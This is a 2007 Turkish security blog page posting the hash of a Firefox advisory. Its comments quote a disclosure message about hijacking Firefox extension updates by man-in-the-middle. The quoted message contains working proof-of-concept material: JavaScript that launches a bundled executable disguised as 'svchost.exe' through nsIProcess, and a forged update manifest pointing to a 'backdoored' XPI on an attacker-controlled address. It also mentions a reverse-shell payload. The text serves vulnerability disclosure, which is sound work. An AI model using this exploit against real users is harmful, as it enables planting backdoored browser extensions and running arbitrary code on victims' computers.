Firefox Hash

21.05.2007
exploit hash firefox

Okuyucu : 2.325
Günlük Okuyucu : 6,4

Firefox advisory MD5 hash : 1A0E6F146C273A1D7513392A1DEB12F0

Bundan, bundan ve bundan sonra artik böyle :)

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

ha söyle ya; sadece firmanin kendisi kadar güvenliklerine dikkat etsen yeter :)

SW [ # | 21.05.2007 ]

http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0535.html

Very good and detailed advisory,
I came up with the same issue about one month ago and developed two PoCs.

Here is the hash : http://ferruh.mavituna.com/makale/firefox-hash/ (shame on
me that I haven't sent to any public mail-list. If you really curious check
out RSS caches and google cache) and brief explanation is in the attachment
(Firefox-MITM.txt).

I attached Google Toolbar PoC. Be careful it's throwing a reverse shell also
I got a PoC for Linux as well.

To clarify things, you can execute arbitrary code with current user's
rights.

Here is a sample code,
--------------------
exepath = Components.classes["mozilla.org/file/directory_service;1"].getService(
Components.interfaces.nsIProperties).get("ProfD",
Components.interfaces.nsIFile).path +
"\\extensions\\{3112ca9c-de6d-4884-a869-9855de68056c}\\chrome\\svchost.exe";
runFile(exepath);

function runFile(f) {
var file = Components.classes["mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);

file.initWithPath(f);

var process = Components.classes["mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);

process.init(file);

var args = [""];
process.run(false, args, args.length);
}

--------------------

Sample update response XML,
----------
<?xml version="1.0"?><RDF:RDF xmlns:RDF="
http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="
http://www.mozilla.org/2004/em-rdf#">
<RDF:Description
about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}">
<em:updates><RDF:Seq>
<RDF:li
resource="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:
4.0.0.16"/>
</RDF:Seq></em:updates></RDF:Description>
<RDF:Description
about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16
">
<em:version>4.0.0.16</em:version>
<em:targetApplication><RDF:Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.5.0</em:minVersion>
<em:maxVersion>2.9.99</em:maxVersion>
<em:updateLink> http://192.168.1.130/firefox/google.xpi</em:updateLink>
</RDF:Description></em:targetApplication></RDF:Description>
</RDF:RDF>
----------
This is our backdoored xpi file url :
http://192.168.1.130/firefox/google.xpi
I modified the google-toolbar.xul and added to run svchost.exe file which is
in xpi file as well.

Sample xpi file attached, modified version of google toolbar extension and
it will work every time you launch Firefox.

Ferruh Mavituna [ # | 12.02.2008 ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

Firefox Hash ile İlişkili Olabilecek Yazılar - Haberler

Rgod
MS08-006 Exploit
Flawed CSRF Protections
Exploit Hash
Hala Güvenli misiniz?

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Aç Karna Güvenlik » Firefox Hash

RSS Feed site statistics RSS Subscribers
Siteyi E-mail ile Takip Et

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında